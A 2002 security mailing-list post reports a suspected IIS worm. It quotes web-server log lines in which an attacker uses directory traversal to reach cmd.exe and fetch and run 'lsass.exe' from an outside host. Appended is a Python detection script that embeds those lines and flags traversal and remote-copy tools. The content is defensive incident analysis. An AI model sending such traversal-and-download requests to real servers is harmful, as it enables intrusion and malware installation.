Security Incidents mailing list archives

Re: new IIS worm? (rcp lsass.exe)


From: "Mike Lewinski" <mike () rockynet com>
Date: Sun, 22 Sep 2002 19:27:29 -0600

I can confirm these scans are appearing on the first host I checked
here:

2002-09-16 09:18:10 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 401 744 96 80 - -
2002-09-16 09:18:11 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 401 744 73 80 - -

lsass.exe is, and has long been, a component of Windows (the server
versions, anyway). A check finds these sizes normally:

11,776 bytes - Windows XP
33,552 bytes - Windows 2000 Advanced Server
10,000 bytes - Windows NT4

I used rcp to snag a copy. Interesting output from strings includes:

telsa5.mine.nu
irc.logicfive.nu

Googling for the first host finds an interesting match:

http://www.esec.dk/Nyheder/1909a2002.htm

That site mentions Microsoft IIS server, IRC, Denial-of-Service, zombie
and "cumulative hotfix installed", but that's about all I understand
of it ;)

Actually, a closer reading seems to reveal that this may be a companion
of slapper:

"Windows program by the Slapper worm's author used in attacks"
and
"The "Slapper Worm" currently ravaging Apache is signed in the source
code by "contem@efnet", that is, the same author or group."

Can anyone translate and shed a little more light on this?

Mike
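The two log entries Mike quotes are what a defender would want to pick out of a full IIS log automatically: an encoded directory traversal (..%5c) reaching cmd.exe, a command-line argument handed to it, and a remote-copy tool (rcp) being used to fetch a binary. The script below is an added example and is not code from the post or from any project; it assumes the W3C field layout named in FIELDS (which matches the token count of the quoted lines but is an assumption), and the third sample line is a constructed benign request added for contrast. The sc-status column is carried into each finding because a 401, as in the post, means IIS refused the request, while a 2xx on the same pattern would mean the command actually ran.

```python
from urllib.parse import unquote, unquote_plus

# Sample IIS log: the first two lines are the entries quoted in the post
# above; the third is a constructed benign request for contrast.
SAMPLE_LOG = """\
2002-09-16 09:18:10 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 401 744 96 80 - -
2002-09-16 09:18:11 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 401 744 73 80 - -
2002-09-16 09:20:00 10.0.0.5 - W3SVC2 GET /index.htm - 200 2048 300 80 - -
"""

# Assumed W3C extended field layout for these lines (14 tokens per entry).
FIELDS = ["date", "time", "c-ip", "cs-username", "s-sitename", "cs-method",
          "cs-uri-stem", "cs-uri-query", "sc-status", "sc-bytes", "cs-bytes",
          "s-port", "cs(User-Agent)", "cs(Referer)"]

# Remote-copy tools that indicate a file is being pulled onto the server.
COPY_TOOLS = {"rcp", "tftp"}


def parse_line(line):
    """Split one log line into a dict, or return None for comments/odd lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def normalize_path(stem):
    """Decode the URI stem (twice, to catch double encoding) and fold
    backslashes into forward slashes so %5c and / compare alike."""
    decoded = unquote(unquote(stem))
    return decoded.replace("\\", "/").lower()


def analyze_entry(entry):
    """Return a list of reasons this entry looks like a cmd.exe traversal scan."""
    reasons = []
    path = normalize_path(entry["cs-uri-stem"])
    if "/../" in path or path.startswith("../"):
        reasons.append("directory traversal in URI")
    if path.endswith("/cmd.exe"):
        reasons.append("cmd.exe requested through the web server")

    # '+' in the query is a space, so decode with unquote_plus.
    command = unquote_plus(entry["cs-uri-query"])
    tokens = command.lower().split()
    if tokens[:1] == ["/c"]:
        reasons.append("command line passed to cmd.exe")
    for tool in COPY_TOOLS:
        if tool in tokens:
            reasons.append("remote copy via " + tool)
    return reasons, command


def scan_log(text):
    """Scan a whole log, returning one finding per suspicious entry."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons, command = analyze_entry(entry)
        if not reasons:
            continue
        status = entry["sc-status"]
        findings.append({
            "time": entry["date"] + " " + entry["time"],
            "client": entry["c-ip"],
            "status": status,
            # A 2xx means the server actually served the request.
            "served": status.startswith("2"),
            "command": command,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        served = "SERVED" if f["served"] else "refused"
        print(f"{f['time']} {f['client']} [{f['status']} {served}] "
              f"{f['command']!r}: {', '.join(f['reasons'])}")
```

Run against a real log, the only change needed is the FIELDS list, which should be taken from the #Fields: header IIS writes at the top of each W3C log file.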


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

